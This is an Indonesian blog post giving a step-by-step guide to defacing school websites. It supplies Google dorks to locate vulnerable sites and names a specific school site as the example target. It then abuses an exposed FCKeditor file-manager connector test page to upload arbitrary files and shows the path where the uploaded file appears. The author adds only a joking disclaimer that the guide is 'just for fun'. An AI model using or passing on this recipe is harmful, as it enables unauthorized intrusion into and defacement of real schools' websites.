Cara Hack/Deface Website Sekolah (sch.id)

23.02 0-Mistake 0 Comments

Cara Hack/Deface Website Sekolah (sch.id)

Kali ini saya akan meng-share tentang cara hack website sekolah (trik yang agak ngawur dan nggak mutu mungkin sih), tapi gak pa-palah. Pertama-tama anda persiapkan bahan untuk hack website sekolah. Eittsss ingat yang ditarget jangan sekolah sendiri nanti berakibat berbahaya :v hahaha! oke langsung chekidot gan! (Klik gambar untuk memperbesar size, kalo misalnya belum kelihatan)

Bahan:
1. Notepad (isi sesukamu) maksudnya buat scriptnya dulu

Note: Harus Udah Punya Scriptnya



Langkah kerja:

1. Masukkan salah satu dork ke Google
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?



Add caption

saya memilih dork inurl:/html/siswa.php? . Nanti akan muncul web untuk ditebas.Pilih salah satu webnya  

2. Oke kalo udah. Saya memilih website yang saya temukan seperti 
http://sman5smg.com/html/siswa.php?id=prestasi
3. Exploit dengan /editor/filemanager/connectors/test.html
contohnya : http://sman5smg.com/editor/filemanager/connectors/test.html lalu Enter
4. Tampilannya akan berubah
5. Pada kolom Connector ubahlah *ASP menjadi *PHP, terus pada kolom Resource Type ganti menjadi File
6. Upload file anda yang berbentuk .txt kalo berhasil ada tanda File Uploaded With No Error

7. Setelah file ter-upload. Kita cari file kita dengan exploit /userfiles/file/namafileanda.txt 
contohnya seperti http://sman5smg.com/userfiles/file/SAS.txt
ingat ini jangan dibuat kriminal...saya post ini bukan untuk mengajari cara kriminal tapi untuk seru seruan aja

You Might Also Like

0 komentar: